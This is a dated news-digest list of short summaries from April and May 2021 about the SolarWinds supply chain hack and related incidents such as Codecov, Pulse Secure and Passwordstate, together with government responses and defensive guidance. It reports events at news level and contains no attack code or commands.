Hackers persistently accessed SolarWinds’ internal systems, Microsoft Office 365 environment, and software development environment for months before carrying out their vicious cyberattack. Hackers compromised SolarWinds’ credentials and conducted research and surveillance via persistent access for at least nine months prior to their October 2019 trial run.
_______________________________________________________________________________________
(May 7, 2021)
US-UK Government warns about SolarWinds attackers adding a new tool to its arsenal
Agencies in the U.S. and the U.K. published a joint report providing more details on the activities of the Russian cyberspy group that is believed to be behind the attack on IT management company SolarWinds. The report reveals that the hackers started using the open-source adversary simulation framework Sliver after some of their operations were exposed.
_______________________________________________________________________________________
(May 7, 2021)
An investigative update of the cyberattack
SolarWinds has revealed that it has found evidence that the threat actor exfiltrated certain information as part of its research and surveillance. The threat actor created and moved files that contained source code for both Orion Platform software and non-Orion products. The threat actor created and moved additional files, including a file that may have contained data supporting SolarWinds’ customer portal application. The threat actor accessed email accounts of certain personnel, and also moved files to a jump server, which was possibly intended to facilitate exfiltration of the files out of the environment.
_______________________________________________________________________________________
(May 7, 2021)
FBI, NSA, CISA & NCSC Issue Joint Advisory on Russian SVR Activity
Government agencies from the United States and the United Kingdom have teamed up to issue a new joint advisory detailing TTPss of Russia's Foreign Intelligence Service (SVR) after the group was publicly attributed to the SolarWinds supply chain attack. Agencies provided more details on SVR activity, including the exploitation that followed the SolarWinds Orion software compromise.
Ref - DarkReading
_______________________________________________________________________________________
(May 7, 2021)
Ransomware, supply chain attacks show no sign of abating
Ransomware and supply chain attacks are two of the most common attack vectors that offer high returns for threat actors. In the aftermath of the SolarWinds attack that had affected prominent companies like Microsoft, the panelists noted that more supply chain attacks have been enabled by the growing dependencies between systems that have become more interconnected than ever.
_______________________________________________________________________________________
(May 7, 2021)
Further TTPs associated with SVR cyber actors
Organizations are advised to follow the mitigation advice and guidance below, as well as the detection rules in the appendix to help protect against this activity. Organizations should also follow the advice and guidance in the recently published NSA advisory and the FBI and CISA alert, which detail further TTPs linked to SVR cyber actors.
_______________________________________________________________________________________
(May 6, 2021)
Following SolarWinds hack, US spy agencies review software suppliers' ties to Russia
U.S. intelligence agencies have begun a review of supply chain risks emanating from Russia in light of the far-reaching hacking campaign that exploited software made by SolarWinds and other vendors. The review will focus on any supply chain vulnerabilities stemming from Russian companies, or the U.S. companies that do business in Russia.
_______________________________________________________________________________________
(May 5, 2021)
Twilio discloses breach caused by Codecov supply chain hack
Twilio posted a blog disclosing that a small number of customer emails had likely been exfiltrated by an unknown attacker who cloned Twilio's code repositories on GitHub in mid-April. The company further connected the activity to the Codecov breach disclosed last month.
_______________________________________________________________________________________
(May 3, 2021)
New Hampshire pushes pause on creating supply chain authority
To reduce cybersecurity risks, a New Hampshire lawmaker has proposed legislation to create an Information Technology Supply Chain Risk Authority to oversee all purchases and acquisitions of software, hardware, and telecommunication services used within state agencies.
Ref - GovTech
_______________________________________________________________________________________
(May 3, 2021)
Stopping the next SolarWinds requires doing something different
The SolarWinds breach is not the first major supply chain breach, but previous similar breaches failed to prompt effective regulatory action. The SolarWinds breach came in via a trusted vendor, which means even the most diligent cyber hygiene and immediate patching would not have helped. Likewise, information sharing is important, but it took nine months to detect the SolarWinds attack — so by the time there was information to share, it was too late.
_______________________________________________________________________________________
(May 3, 2021)
Key indicators that the supply chain vendor has been breached
If a vendor does not provide clear and substantial responses to risk assessments, they could be concealing gaping holes in their information security program. If a vendor's website or mobile app is behaving suspiciously, a cyberattack could be taking place. If system tracking can monitor network activity between internal resources and vendors, establish a baseline for normal interaction and keep an eye out for login attempts outside of normal hours.
_______________________________________________________________________________________
(May 1, 2021)
More US agencies potentially hacked, this time with Pulse Secure exploits
At least five US federal agencies may have experienced cyberattacks that targeted recently discovered security flaws that give hackers free rein over vulnerable networks, the US CISA said. The zero-day vulnerability, tracked as CVE-2021-22893, was under active exploitation.
______________________________________________________________________________________
(April 30, 2021)
Key questions to consider to help mitigate against supply chain attacks
With the recent SolarWinds SunBurst exploit, many security professionals are reassessing standard threat models and national cyber-defense strategies. How can organizations and system owners increase trust while still maintaining their own IT systems now? Enterprises can begin by rethinking their definition of access control, developing a patch management strategy that promotes research and testing, and monitoring their network for malicious behavior in collaboration with cyber threat intelligence.
_______________________________________________________________________________________
(April 30, 2021)
A tale of two hacks: from SolarWinds to Microsoft Exchange
The past four months have exposed two high-profile attacks, which both had pundits declaring them the “worst-ever” and “unprecedented.” They shared other similarities – both attacked businesses rather than individuals and affected tens of thousands of organizations. Both hacks involved nation-states. And in either case, no affected organization could be fully certain of finding and evicting any adversary.
_______________________________________________________________________________________
(April 29, 2021)
Finding the weakest link in the supply chain
An organization's cybersecurity defenses are only as strong as its weakest link. Successful supply chain attacks are considered especially dangerous because of their high potential for widespread contagion. With just one successful breach of a single vendor component, hackers could gain access to all of the organizations that make use of that vendor's supply chain.
_______________________________________________________________________________________
(April 29, 2021)
A new PHP composer bug could enable widespread supply-chain attacks
The maintainers of Composer, a package manager for PHP, have shipped an update to address a critical vulnerability that could have allowed an attacker to execute arbitrary commands and "backdoor every PHP package," resulting in a supply-chain attack. Tracked as CVE-2021-29472, the security issue was discovered and reported on April 22 by researchers from SonarSource, following which a hotfix was deployed less than 12 hours later.
_______________________________________________________________________________________
(April 29, 2021)
Biden preparing cybersecurity executive order in response to SolarWinds attack
President Biden is preparing a cybersecurity executive order focused on helping the country protect itself from future cyberattacks following the sophisticated SolarWinds hack that was discovered in December. The order, as it is written now, includes a spate of requirements that companies who conduct business with the government will be instructed to follow.
_______________________________________________________________________________________
(April 28, 2021)
Minimizing the risk of supply chain attacks – best practice guidelines
Sophos provides several recommendations to minimize the risk of supply chain attacks. It recommends switching from a reactive to a proactive approach to cybersecurity, monitor for early signs of compromise, audit the supply chain, assess the security posture of all suppliers and business partners, and have a constant review of IT security operation hygiene.
_______________________________________________________________________________________
(April 28, 2021)
Lawmakers want to create a reserve corps to respond to the next SolarWinds
A bipartisan group of lawmakers wants to create a National Guard-like program to address growing cybersecurity vulnerabilities faced by the U.S. government. Legislation introduced today would pilot two separate reserves of trained cybersecurity professionals for the Department of Homeland Security and the Defense Department.
_______________________________________________________________________________________
(April 28, 2021)
CISA issues guidance on defending against software supply chain attacks
The CISA has issued guidance following the compromise of the SolarWinds software that affected thousands of entities across the US and beyond. The guidance took the form of a primer for companies, explaining the nature of the software supply chain and the various access points where supply chain vulnerabilities exist. It concludes with concrete recommendations for both vendors and their customers with a discussion on the Secure Software Development Framework (SSDF) and Cyber Supply Chain Risk Management (C-SCRM).
Ref - CSO Online
_______________________________________________________________________________________
(April 28, 2021)
5 ways to protect software supply-chains from malicious attackers
Users can protect their organization against supply-chain attackers by avoiding the use of third-party modules; checking for threats when using modules created by unknown authors; performing automated scans of code submitted in repositories; having a plan made for external services; and creating an on-premises and cloud strategy.
Ref - Radware
_______________________________________________________________________________________
(April 27, 2021)
Another SolarWinds lesson: hackers are targeting Microsoft authentication servers
During SolarWinds, hackers directly targeted the AD FS servers to obtain certifications. Mandiant’s new attack does not require direct access to the AD FS server. Rather, hackers would spoof one AD FS server communicating with another to obtain its keys. This is not trivial, as it still requires credentials from an extremely privileged account to pull off. But given the capacity of the hackers involved in SolarWinds, chief information security officers should begin to see these kinds of attacks as part of the threat landscape.
_______________________________________________________________________________________
(April 27, 2021)
Software supply chain may get you by exploiting Open-Source libraries
Nearly all software programs developed today contain open-source components. Unfortunately, open-source packages have the same challenges as any other software (i.e. they contain security bugs). Worse, once included in an application they can become rapidly out of date, lacking the most recent bug fixes. On top of that, open-source code is freely available to everyone, so bad actors can study and experiment with it without fear of exposing their next wave of attacks.
_______________________________________________________________________________________
(April 27, 2021)
Defending against software supply chain attacks
The consequences of a software supply chain attack can be severe. First, threat actors use the compromised software vendor to gain privileged and persistent access to a victim network. By compromising a software vendor, they bypass perimeter security measures like border routers, firewalls, etc., and gain initial access. If a threat actor loses network access, they may re-enter a network using the compromised software vendor.
_______________________________________________________________________________________
(April 27, 2021)
DFS report identifies key cybersecurity measures to reduce supply chain risk
The New York State Department of Financial Services (DFS) released a report on the Department’s investigation of the New York’s financial services industry’s response to the supply chain attack of the IT company SolarWinds. During the SolarWinds Attack, hackers corrupted routine software updates that were downloaded onto thousands of organizations’ information systems.
_______________________________________________________________________________________
(April 26, 2021)
SolarWinds, Microsoft hacks prompt focus on Zero-Trust security
Analysis of the breaches, which exploited vulnerabilities in software from SolarWinds Corp. and Microsoft Corp., from the CISA, the NSA, and the FBI found that the hackers were often able to gain broad systems access. In many cases, the hackers moved through networks unfettered to set up back doors and administrator accounts. To prevent such attacks, zero-trust models should be more widely adopted by the public and private sectors.
_______________________________________________________________________________________
(April 26, 2021)
CISA and NIST release new interagency resource to defend against supply chain attacks
To help software vendors and customers defend against these attacks, CISA and the NIST have released Defending Against Software Supply Chain Attacks. This new interagency resource provides an overview of software supply chain risks and recommendations. The publication also provides guidance on using NIST’s Cyber Supply Chain Risk Management (C-SCRM) framework and the Secure Software Development Framework (SSDF) to identify, assess, and mitigate risks.
_______________________________________________________________________________________
(April 26, 2021)
Another top VPN is reportedly being used to spread SolarWinds hack
Threat actors used the Pulse Secure VPN appliance to install the Supernova webshell in a victim’s SolarWinds Orion server and collect user credentials without permission, a new warning has said. This appears to be the first observed instance of a threat actor injecting the Supernova webshell directly into a victim’s SolarWinds installation.
_______________________________________________________________________________________
(April 25, 2021)
Stopping SolarWinds’ style mega hacks, but preserving democracy
The SolarWinds and Shirbit hacks announced last December, along with a variety of other major cyberattacks, have convinced the US and Israeli governments that leaps forward are needed to keep up with the new frenetic pace of digital warfare. And taking countermeasures involves several challenges. One of the challenges is that the NSA is more limited by law from counter-hacking a US computer already hacked by a foreign adversary than it is going against foreign computers.
_______________________________________________________________________________________
(April 24, 2021)
HashiCorp is the latest victim of the Codecov supply-chain attack
Open-source software tools and Vault maker HashiCorp has disclosed a security incident that occurred due to the recent Codecov attack. HashiCorp, a Codecov customer, has stated that the recent Codecov supply-chain attack aimed at collecting developer credentials led to the exposure of HashiCorp's GPG signing key.
_______________________________________________________________________________________
(April 23, 2021)
Senators introduce legislation to protect critical infrastructure against attack
Sens. Maggie Hassan (D-N.H.) and Ben Sasse (R-Neb.) on Friday introduced legislation intended to protect critical infrastructure from cyberattacks and other national security threats. The National Risk Management Act would require the CISA to conduct a five-year national risk management cycle.
_______________________________________________________________________________________
(April 23, 2021)
Passwordstate password manager hacked in a supply chain attack
Click Studios, the company behind the Passwordstate enterprise password manager, notified its customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks. Malicious upgrades leading to the supply chain compromise were potentially downloaded by customers between April 20 and April 22.
_______________________________________________________________________________________
(April 23, 2021)
Supply chain attack risk looms over three million mobile app users of CocoaPods
A remote code execution (RCE) vulnerability in the central CocoaPods server could have potentially impacted up to three million mobile apps that relied on the open-source package manager. CocoaPods maintainer Orta Therox likened the potential impact of the flaw to that caused by XcodeGhost, a counterfeit version of macOS development environment Xcode.
_______________________________________________________________________________________
(April 23, 2021)
The new analysis uncovers extensive SolarWinds attack infrastructure
Cybersecurity researchers that have been tracking the infrastructure footprint of SolarWinds threat actors claim the network of servers used in the attack is "significantly larger than previously identified". RiskIQ has identified an additional 18 command and control (C&C) servers that communicated with the malicious payloads that were dropped as part of the cyberattack.
_______________________________________________________________________________________
(April 22, 2021)
SUPERNOVA redux, with a portion of masquerading
The SolarWinds attack has a few interesting traits. The first is that the adversary is using residential IP addresses based in the US to make them appear as US-based employees and then leveraging valid accounts to gain access via the VPN. From there, the adversary used a VM and obfuscated PowerShell scripts to move laterally to the SolarWinds server. At this point, the SUPERNOVA webshell is installed.
_______________________________________________________________________________________
(April 22, 2021)
CISA identifies Supernova malware during incident response
CISA has revealed that the SolarWinds attackers connected to the entity’s network via a Pulse Secure virtual private network (VPN) appliance, moved laterally to its SolarWinds Orion server, installed malware referred to by security researchers as SUPERNOVA (a .NET webshell), and collected credentials. CISA has released a report providing TTPs observed during an incident response engagement.
_______________________________________________________________________________________
(April 22, 2021)
SolarWinds hack analysis reveals 56% boost in command server footprint
The Sunburst/Solorigate backdoor was designed to identify, avoid, or disable different security products, with a particular focus on circumventing antivirus software developed by FireEye, CrowdStrike, Microsoft, ESET, and F-Secure in the first stage of infection. The second and third stages included custom droppers (Teardrop/Raindrop) and the deployment of additional malware alongside Cobalt Strike. Implants for persistence with components dubbed Goldmax/GoldFinder/Sibot, as well as Sunshuttle, have also been connected to these stages.
_______________________________________________________________________________________
(April 22, 2021)
Software supply chain may get you by exploiting third-party applications
Attacks targeting “zero-days,” or unpatched security bugs, in commonly used third-party applications are another example of the risks from the software supply chain. The recent attacks on the Microsoft Exchange Server are just the latest examples of this type of software supply chain attack. In this case, bugs in Exchange Server allowed attackers to read emails and install a web shell.
_______________________________________________________________________________________
(April 22, 2021)
Supernova threat actors masqueraded as remote workers to access breached network
Members of an APT group, masquerading as teleworking employees with legitimate credentials, accessed a U.S. organization's network and planted a backdoor called Supernova on its SolarWinds Orion server for conducting reconnaissance, domain mapping, and data theft. The attackers had access to the network for nearly one year, from March 2020 to February 2021, before they were discovered and blocked.
_______________________________________________________________________________________
(April 21, 2021)
White House shares learnings from the SolarWinds and Microsoft Exchange server cyber incidents
Lessons learned from the recent attacks include 'integrating private sector partners at the executive and tactical levels'. It also includes involving private sector organizations in the response in order to help deliver fixes smoothly, like Microsoft's one-click tool to simplify and accelerate victims' patching and clean-up efforts, as well as sharing relevant information between firms.
_______________________________________________________________________________________
(April 20, 2021)
A software supply chain may take you down via vendor compromise
Arguably the most sophisticated of the supply chain attack methods, a Vendor Compromise typically starts with a reconnaissance phase to understand which organizations use the vendor’s software, and other relevant details. Next, the bad actor attempts to gain valid vendor employee credentials via social engineering, phishing, or other more technical means. The malicious operator then attempts to laterally move to the software build environment in order to modify the source code of the application that the vendor provides to its users.
_______________________________________________________________________________________
(April 20, 2021)
The wide web of nation-state hackers attacking the US
Both the SolarWinds supply chain and Microsoft Exchange Server attacks have shown, the targets are no longer limited to federal agencies and the largest companies. Enterprises of all sizes are now at risk, whether it's ransomware or a data breach. In terms of attacks on the U.S., nation-state threat actors typically (but not always) come from the "big four": China, Russia, North Korea, and Iran.
_______________________________________________________________________________________
(April 20, 2021)
Codecov supply chain attack has echoes of SolarWinds
To date, Codecov says that it has detected periodic alterations of the Bash uploader script going back as far as 31 January, which ultimately could have allowed whoever was behind the attack to export information stored in its users’ continuous integration (CI) environments. Among Codecov’s larger customers, both HPE and IBM confirmed to Reuters that they were now probing their own systems for signs of intrusion.
_______________________________________________________________________________________
(April 20, 2021)
Hundreds of networks reportedly hacked in Codecov supply-chain attack
In new reporting by Reuters, investigators have stated that hundreds of customer networks have been breached in the incident, expanding the scope of this system breach beyond just Codecov's systems. Codecov had suffered a supply-chain attack that went undetected for over 2-months.
_______________________________________________________________________________________
(April 19, 2021)
White House stands down SolarWinds, Microsoft Exchange cyber response groups
Stepped up patching for the SolarWinds and Microsoft Exchange vulnerabilities has allowed the White House to stand down the two Unified Coordination Groups (UCGs) tasked with tackling the government's response to the cybersecurity threats. They were activated shortly after each incident was discovered.
_______________________________________________________________________________________
(April 19, 2021)
SolarWinds backdoor was downloaded by 1/4th of Electric Utilities - US Utility Regulator
North American Electric Reliability Corp. (NERC), a non-profit regulatory authority that oversees utilities in the United States and Canada, revealed this week that about 25% of the electric utilities on the North American power grid downloaded the SolarWinds backdoor.
_______________________________________________________________________________________
(April 19, 2021)
Positive Technologies denies involvement in SolarWinds attack
Responding to sanctions imposed by the US government, Russia-headquartered cybersecurity company Positive Technologies (PT) has denied any wrongdoing, and dismissed the claims as “groundless accusation”. Last week, the US Department of the Treasury imposed sanctions on several Russian technology firms, including PT, accusing them of helping Russian state actors to conduct cyberattacks against the West.
_______________________________________________________________________________________
(April 19, 2021)
XCSSET malware now targeting Apple's M1-based Macs
A Mac malware campaign targeting Xcode developers has been retooled to add support for Apple's new M1 chips and expand its features to steal confidential information from cryptocurrency apps. XCSSET continues to abuse the development version of the Safari browser to plant JavaScript backdoors to websites via Universal Cross-site Scripting (UXSS) attacks.
_______________________________________________________________________________________
(April 19, 2021)
Codecov hack could be another SolarWinds-type attack
US federal authorities are investigating a security breach suffered by software auditing company Codecov. According to a statement put out by the San Francisco-based firm, an unscrupulous user broke through its digital defenses and modified its Bash Uploader script. While Codecov has emailed all affected users, the nature of the changes to the script potentially puts thousands of customers at risk.
Ref - Techradar
_______________________________________________________________________________________
(April 19, 2021)
Zero-trust is the best defense against third-party attacks
Adopting a zero-trust security strategy can better safeguard organizations against third-party attacks, where suppliers should not simply be entrusted to do the right thing. The Acronis CEO believed third-party attacks such as those involving Accellion and Singapore Airlines (SIA) could have been prevented with a zero-trust architecture. Zero trust isn't just about not trusting anyone, it's about personal cyber hygiene.
Ref - ZDNet
_______________________________________________________________________________________
(April 19, 2021)
Next SolarWinds crisis could happen very soon
The SolarWinds cyber attack, which saw around 100 companies and 9 US federal agencies compromised, isn’t one to be treated as an isolated incident. It is rather a stark warning of what is about to come if decisive action isn’t taken. The vice-president and chief information security officer at Hitachi Vantara discuss how companies can avoid a similar supply-chain crisis.
Ref - InformationAge
_______________________________________________________________________________________
(April 17, 2021)
SolarWinds hacking campaign puts Microsoft in the hot seat
Microsoft has offered all federal agencies a year of “advanced” security features at no extra charge. Microsoft also removed names of several Russian IT companies, including Positive Technologies, from a list to whom Microsoft supplied the early access to data on vulnerabilities detected in its products.
_______________________________________________________________________________________
(April 17, 2021)
Six out of 11 EU agencies running Solarwinds Orion software were hacked
CERT-EU confirmed that 14 EU agencies were running the SolarWinds Orion monitoring software, and six of them were breached. Anyway, the CERT-EU did not reveal the name of the EU agencies that installed the tainted Orion updates. CERT-EU said that some agencies sent limited details on the attacks, and, while in other reports, network logs, used to hunt for clues about the hackers’ actions, were often not available.
_______________________________________________________________________________________
(April 17, 2021)
Biden upends U.S. convention on cyber espionage
President Biden’s decision to punish Russia for the SolarWinds hack broke with years of U.S. foreign policy that has tolerated cyber espionage as an acceptable form of 21st-century spycraft. It also said U.S. intelligence had “high confidence” that Russia’s foreign intelligence service, the SVR, was behind last year’s SolarWinds hack, which compromised at least nine federal agencies and about 100 private-sector organizations.
_______________________________________________________________________________________
(April 16, 2021)
Commerce Dept. may have found SolarWinds backdoor in Aug. 2020
Last month, Microsoft and FireEye identified that file as a newly-discovered fourth malware backdoor used in the sprawling SolarWinds supply chain hack. FireEye refers to the backdoor as “Sunshuttle,” whereas Microsoft calls it “GoldMax.” A search in VirusTotal’s malware repository shows that on Aug. 13, 2020, someone from the National Telecommunications and Information Administration (NTIA), a division of the U.S. Commerce Department, had
uploaded a file with that same name and file hashes.
_______________________________________________________________________________________
(April 16, 2021)
More countries officially blame Russia for SolarWinds attack
The United Kingdom, Canada, the European Union, and NATO have expressed support for the United States in blaming Russia for the cyberattack on IT management company SolarWinds, which impacted organizations worldwide. The announcements were made the same day that the United States expelled 10 Russian diplomats and sanctioned dozens of companies and people.
_______________________________________________________________________________________
(April 16, 2021)
The untold story of the SolarWinds hack
Hackers believed to be directed by the Russian intelligence service, the SVR, used the routine software update to slip malicious code into Orion's software and then used it as a vehicle for a massive cyberattack against America. The concern is that the same access that gives the Russians the ability to steal data could also allow them to alter or destroy it.
_______________________________________________________________________________________
(April 15, 2021)
The U.S. imposes sanctions on Russia over cyber-attacks
The US has announced sanctions against Russia in response to what it says are cyber-attacks and other hostile acts. The measures, which target dozens of Russian entities and officials, aiming to deter Russia's harmful foreign activities. The statement says Russian intelligence was behind last year's massive SolarWinds hack and accuses Moscow of interference in the 2020 election.
Ref - BBC
_______________________________________________________________________________________
(April 15, 2021)
Codecov Bash Uploader tool compromised in supply chain hack
At the beginning of April, security professionals at Codecov learned that someone had gained unauthorized access to their Bash Uploader script and modified it without permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify the Bash Uploader script.
_______________________________________________________________________________________
(April 15, 2021)
Biden unveiled Russia sanctions over SolarWinds hack
Ten Russian diplomatic officials are to be expelled from the US and up to 30 entities will be blacklisted in the largest round of sanctions action against Russia of Joe Biden’s presidency. The US is set to announce new sanctions against Russia as soon as Thursday in retaliation for Moscow’s interference in elections, alleged bounties on US soldiers in Afghanistan, and cyber-espionage campaigns such as the SolarWinds hack, according to reports in US and international media.
Ref - The Guardian
_______________________________________________________________________________________
(April 14, 2021)
The misuse of X.509 certificates & keys in SolarWinds hack
A report described the misuse of X.509 certificates and keys in the SolarWinds attack and how Cryptomathic CKMS and CSG could help protect against such attacks. While multiple failures led to the attack, one of the most glaring failures was that the attackers could misuse X.509 certificates and keys to forge and undermine trust.
Ref - Cryptomathic
_______________________________________________________________________________________
(April 14, 2021)
Advanced supply chain attacks need a strategic counter-defense policy
Enterprise CIOs and CISOs in government and the private sector are still assessing the full impact of the advanced supply chain attacks uncovered in recent months. The fact of the matter here is that cyber is where the new wars are being fought and supply chain attacks are a winning playbook for the state-sponsored attackers.
Ref - CyberScoop
_______________________________________________________________________________________
(April 14, 2021)
Sunburst hack costs SolarWinds at least $18M
SolarWinds disclosed that it took a hit of at least $18 million from the massive Russian malware attack that compromised its flagship Orion technology management software. In releasing preliminary first-quarter results, SolarWinds said it spent $18 million to $19 million to investigate and remediate the cyber incident, related legal and other professional services, and consulting services provided to customers at no charge.
Ref - CFO
_______________________________________________________________________________________
(April 13, 2021)
A macOS malware is hidden into the NPM package supply chain
A new malicious package has been spotted on the npm registry, which targets NodeJS developers using Linux and Apple macOS operating systems. The malicious package is called "web-browserify," and imitates the popular Browserify npm component downloaded over 160 million times over its lifetime.
Ref - Bleeping Computer
_______________________________________________________________________________________
(April 13, 2021)
U.S. intelligence community details growing influence threats in wake of SolarWinds attacks
The intelligence community made its most direct public attribution yet that Russia was behind weaving malicious code into a SolarWinds software update to facilitate a sweeping espionage operation, impacting hundreds of companies and U.S. federal agencies. The readout does not specify whether Biden specifically discussed SolarWinds with his Russian counterpart.
_______________________________________________________________________________________
(April 13, 2021)
Spy Chiefs to warn of threats from SolarWinds to North Korea
Biden’s intelligence team -- including Director of National Intelligence Avril Haines and CIA Director William Burns -- is under increasing pressure to respond to a widening series of national security threats while defending the administration’s continuing reviews and policy approaches even as it nears the 100-day mark in office.
Ref - Bloomberg
_______________________________________________________________________________________
(April 13, 2021)
Detecting the next SolarWinds-Style cyberattack
Developing SIEM rules, using the SolarWinds attack as an example, can help in the detection of the next SolarWinds-like attack. Sigma rules can be used as a sort of a common language to create and share quality queries regardless of the SIEM any organization uses. This will enable Security Operations teams to build out the elements needed to detect future attacks. The same Sigma Rule can be used across multiple SIEM, including Splunk, Qradar, and Azure Sentinel.
_______________________________________________________________________________________
(April 12, 2021)
SolarWinds hack underscores the need for moving to the cloud
According to Microsoft CEO Satya Nadella, the SolarWinds attack underscores the importance of implementing zero trust architecture and migrating to the cloud. Nadella sees the SolarWinds hack as a wake-up call for all companies to take security as a first-class priority.
Ref - CRN
_______________________________________________________________________________________
(April 12, 2021)
Biden names former top NSA officials to two key cyber roles
President Biden has appointed former National Security Agency (NSA) deputy director Chris Inglis and former deputy for counterterrorism at the NSA Jen Easterly to two top cyber roles in the administration. The appointments come as the White House is still dealing with the fallout over the SolarWinds cyber attack, which infiltrated multiple federal agencies.
Ref - Axios
_______________________________________________________________________________________
(April 10, 2021)
APKPure users targeted via a supply chain attack
APKPure, one of the largest alternative app stores, was the victim of a supply chain attack, threat actors compromised client version 3.17.18 to deliver malware. The app store is available only on devices that use Google Mobile Services (GMS) and are firmly tied to Google’s infrastructure. The tainted client downloads and installs various apps, including other malicious payloads.
Ref - Security Affairs
_______________________________________________________________________________________
(April 9, 2021)
Stopping or preventing the next SolarWinds breach
Mitigating the next SolarWinds breach will require more cyber-savvy people to assess and recognize those threats, explain their potential impact and advocate for enterprise-wide investment in the appropriate levels of protection. Additionally, it will require more boots on the ground in a field that has evolved to encompass a growing array of sub-areas and rapidly changing technologies.
_______________________________________________________________________________________
(April 9, 2021)
Gigaset devices laced with malware in a latest supply chain attack
Cybercriminals managed to sneak several malicious apps onto Gigaset Android devices by compromising a server belonging to an external update service provider. The models affected, according to Malwarebytes, including the Gigaset GS270 and GS160, Siemens GS270 and GS160, all running Android 8, as well as the Alps P40pro, running Android 9, and S20 pro+, running Android 10.
Ref - IT Pro
_______________________________________________________________________________________
(April 9, 2021)
Supply chain disruptions lead to the loss of trillions of dollars
Supply chain disruptions in 2020 had a real impact on the bottom line, as companies lost trillions of dollars in revenue, according to the report, with 64% of respondents reporting revenue losses between 6% and 20%. The recent survey indicated that the disruptions caused a big hit in brand reputation, with 38% of respondents reporting that their brands had been impacted. Many respondents said that their struggles to maintain supplies of goods and services left customers frustrated.
Ref - TechTarget
_______________________________________________________________________________________
(April 9, 2021)
What the Titans of Industry Reveal about SolarWinds Attack
During the testimony, it was outlined how the SolarWinds software was hijacked and used to break into a host of other organizations, and that the hackers had been able to read Microsoft’s source code for user authentication. Unfortunately for Microsoft, and strongly pointed out by CrowdStrike, the data hackers took advantage of well-known vulnerabilities in their Windows authentication and active directory federation services.
Ref - Security Boulevard
_______________________________________________________________________________________
(April 9, 2021)
How to protect against software supply-chain attacks
Organizations can protect themselves against supply-chain attacks with some simple tips. They should avoid the use of third-party modules, watch for threats when using modules by unknown authors, and perform automated scans of code submitted in repositories. They can also Have a plan for external services and develop an on-premises and cloud strategy.
_______________________________________________________________________________________
(April 8, 2021)
CISA releases tool to review Microsoft 365 post-compromise activity
CISA has released a new tool, dubbed Aviary, that can help security teams visualize and analyze data outputs generated using Sparrow, an open-source PowerShell-based tool for detecting potentially compromised applications and accounts in Azure and Microsoft 365. Sparrow was created to help defenders hunt down threat activity after the SolarWinds supply-chain attack.
_______________________________________________________________________________________
(April 8, 2021)
How to minimize cyberattacks on supply and value chains
Organizations can mitigate access-related third-party risk in several ways. This includes providing an identity to anything connecting to the enterprise, including people, systems, and things. Another way is taking advantage of identity broker technology to verify credentials and enrich authentication requirements. Accessing governance for third-party identities and centrally managing all third-party access can also help minimize the risks.
_______________________________________________________________________________________
(April 8, 2021)
Biden administration sets the stage for retaliation against Russia over SolarWinds attack
The Biden administration completed an intelligence review of alleged Russian meddling in the SolarWinds cybersecurity attack and interference in US elections. The review could set the stage for possible retaliatory actions like enacting sanctions or expulsion of Russian intel officers in the US.
_______________________________________________________________________________________
(April 7, 2021)
In another supply chain incident, Gigaset injects malware into victims' phones
Android smartphones from Gigaset have been infected by malware directly from the manufacturer in what appears to be a supply-chain attack. The Trojan, once downloaded and installed on a victim's device via a poisoned software update from the vendor, is capable of opening browser windows, fetching more malicious apps, and sending people text messages to further spread the malware.
_______________________________________________________________________________________
(April 7, 2021)
Supply?chain attacks - When trust goes wrong
Minimizing the risk of a supply-chain attack involves a never-ending loop of risk and compliance management. In the SolarWinds hack, the post-attack in-depth inspection of the third-party vendor’s product identified the exploit buried deep in the code. As a preventive measure, organizations need to have visibility into all of their suppliers and the components they deliver, which includes the policies and procedures that the company has in place.
_______________________________________________________________________________________
(April 6, 2021)
Senators press for more on SolarWinds hack after AP report
Key lawmakers said they're concerned they've been kept in the dark about what suspected Russian hackers stole from the federal government and they pressed Biden administration officials for more details about the scope of what's known as the SolarWinds hack.
Ref - Star Tribune
_______________________________________________________________________________________
(April 6, 2021)
RSA Conference 2021 will have a keynote from SolarWinds’s president
RSA Conference announced that Sudhakar Ramakrishna, President of SolarWinds, has joined the keynote line-up for RSA Conference 2021. He will be joined by Laura Koetzle to explore the technical elements of the breach and will provide a deep understanding of the sophistication of the overall operation of the nation-state attack.
Ref - AP News
_______________________________________________________________________________________
(April 5, 2021)
SolarWinds type attacks need a serious approach toward cybersecurity
The federal government has to take cybersecurity more seriously, both from a funding and a legislation standpoint after the SolarWinds breach. There is some hope that this will happen with the new administration, but it remains to be seen if talk will turn into action and real change. Only with a concerted effort across all levels of government, big to small, national/state to local, will we be able to overcome this cyber assault and keep our citizens safe and secure.
Ref - GovTech
_______________________________________________________________________________________
(April 5, 2021)
The cybersecurity warning system in the U.S.
Many vulnerabilities and threats aren’t discovered by the government but are regularly uncovered by hackers who find bugs, notify companies, and often work with them to develop fixes. In turn, CISA can immediately issue directives, as it did during SolarWinds and the Microsoft Exchange compromise, that mandate action for federal agencies and sound the clarion call for others to heed.
Ref - The Wall Street Journal
_______________________________________________________________________________________
(April 2, 2021)
The importance of supply chain risk management
With cloud and digital technology allowing companies to flourish and succeed globally, the world has never been more interconnected. However, this comes with elevated risk. Partners, vendors, and third parties can expose companies and malicious hackers are known to target organizations through their supply chain. As a result, supply chain risk management has become a critical component of any company’s risk management and cybersecurity strategy.
Ref - Varonis
_______________________________________________________________________________________
(April 2, 2021)
The positive outcome from the SolarWinds breach
The SolarWinds compromise may have some positive outcomes by shining an even harsher light on the complacency that still exists when it comes to security. It is important especially for the different security standards that are applied to development/supplier systems compared to in-house production systems. Now, securing the supply chain has become a hot topic, and organizations can do better to protect their infrastructure.
Ref - BMC
_______________________________________________________________________________________
(April 2, 2021)
How Russian hackers targeted US cyber first responders in SolarWinds breach
After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down. The hackers identified a handful of key cybersecurity officials and analysts who would be among the first to respond once the hack was detected, so-called 'threat hunters,' and attempted to access their email accounts.
_______________________________________________________________________________________
(April 1, 2021)
After the hack, officials draw attention to supply chain threats
The National Counterintelligence and Security Center warned that foreign hackers are increasingly targeting vendors and suppliers that work with the government to compromise their products in an effort to steal intellectual property and carry out espionage. The NCSC said it is working with other agencies, including the CISA to raise awareness of the supply chain issue.
_______________________________________________________________________________________
(April 1, 2021)
Learnings from the SolarWinds supply chain attack
